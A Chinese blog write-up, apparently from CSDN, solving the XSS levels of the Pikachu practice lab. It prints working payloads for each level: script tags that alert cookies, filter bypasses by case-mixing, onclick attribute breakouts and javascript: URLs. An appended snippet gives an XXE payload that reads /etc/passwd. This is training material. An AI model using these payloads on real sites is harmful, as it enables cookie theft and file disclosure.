pikachu之跨站脚本攻击(x‘s‘s)

1get型
输入a看一下
接着输入<a>
发现<>没有被过滤当做标签处理了
尝试在表单提交的框里面,输入xss语句
尝试输入<script>alert(1)</script>
发现有长度限制
因为这里是get请求
get请求的特点是:传参是在url中的
所以我们可以在url中输入xss语句<script>alert(1)</script>
弹cookie
<script>alert(document.cookie)</script>
2反射型xss(post)
点一下提示给了账号密码直接登录
输入aaa       burp抓包
将aaa换为 <script>alert(1)</script>
换为<script>alert(document.cookie)</script>弹出cookie
3存储型xss
直接输入。。。。 <script>alert(1)</script>            <script>alert(document.cookie)</script>
4DOM型xss
输入 <script>alert(1)</script> 后报错
看下源代码
找找 what do you see?在哪
发现实在</a>标签内的,</a>标签是超链接标签从一个页面到另外一个
<a href='"'(用单引号将`"`闭合)+οnclick=alert(1)(在可控部分输入onclick事件)+'"'(用单引号将`"`闭合)>what do you see?</a>
源码部分:<a href='"+str+"'>what do you see?</a>
使用
' οnclick=alert(1) '
' οnclick=alert(document.cookie) '
可以弹出
5DOM xss-x
这一关和XSS-DOM型xss的区别
在于这里有两个a标签
闭合代码尝试使用onclick
' οnclick=alert(document.cookie) '
6xss之盲打
随便 账号密码都输入 <script>alert(document.cookie)</script>输入后直接提交成功
但是它暴露了登录的地址
拼接一下直接登录
登录的时候就已经有弹窗了因为刚才的输入已经保存进去了
7xss之过滤
我输入 <script>alert(1)</script>等都发现显示的都一样然后就查看代码
他把输入的都过滤了
试试双写不行试试大小写可以
<sCrIpt>alert(document.cookie)</scriPT>
xss之 htmlspecialchars
输入<script>alert(document.cookie)</script>
一点就是报错
闭合了<>
那就 '  οnclick='alert(document.cookie)
被记录点一下链接
8xss  herf
额你怎么输都错了 <script>alert(document.cookie)</script>
它都给你过滤了
使用伪协议
javascript:alert(document.cookie)
9xss之js
输入<script>alert(document.cookie)</script>没反应
看看代码
尝试闭合
</script><script>alert(document.cookie)</script>
'; alert(document.cookie)//
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XXE攻击(XML External Entity Injection)是一种常见的网络安全攻击,它利用 XML 解析器的漏洞,将恶意的 XML 实体注入到应用程序中,从而实现对目标系统的攻击。下面介绍如何在 pikachu 靶场上实施 XXE 攻击。 步骤1:选择目标 在 pikachu 靶场中,可以选择一个目标进行攻击。例如,选择其中一个常见的目标“WebGoat”,这是一个用于学习 Web 应用程序漏洞的靶场。在 pikachu 靶场中,可以通过访问“https://ip:8443/WebGoat/attack”进入 WebGoat 靶场。 步骤2:查找漏洞 在 WebGoat 靶场中,有许多不同类型的漏洞可供攻击者利用。在这里,我们将选择“XXE Injection”漏洞进行攻击。 步骤3:编写攻击脚本 编写攻击脚本,该脚本将恶意的 XML 实体注入到目标应用程序中。以下是一个简单的攻击脚本示例: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> ``` 在此脚本中,我们注入了一个实体“xxe”,它将读取目标系统的“/etc/passwd”文件并将其返回。 步骤4:发送攻击 将攻击脚本发送到目标系统。在 WebGoat 靶场中,可以通过简单地将脚本复制并粘贴到相应的输入框中进行攻击。 步骤5:获取攻击结果 如果攻击成功,将返回目标系统的“/etc/passwd”文件内容。 需要注意的是,XXE 攻击可能会导致目标系统中的敏感信息泄露,因此请在合法授权和合规框架内进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安小趴菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值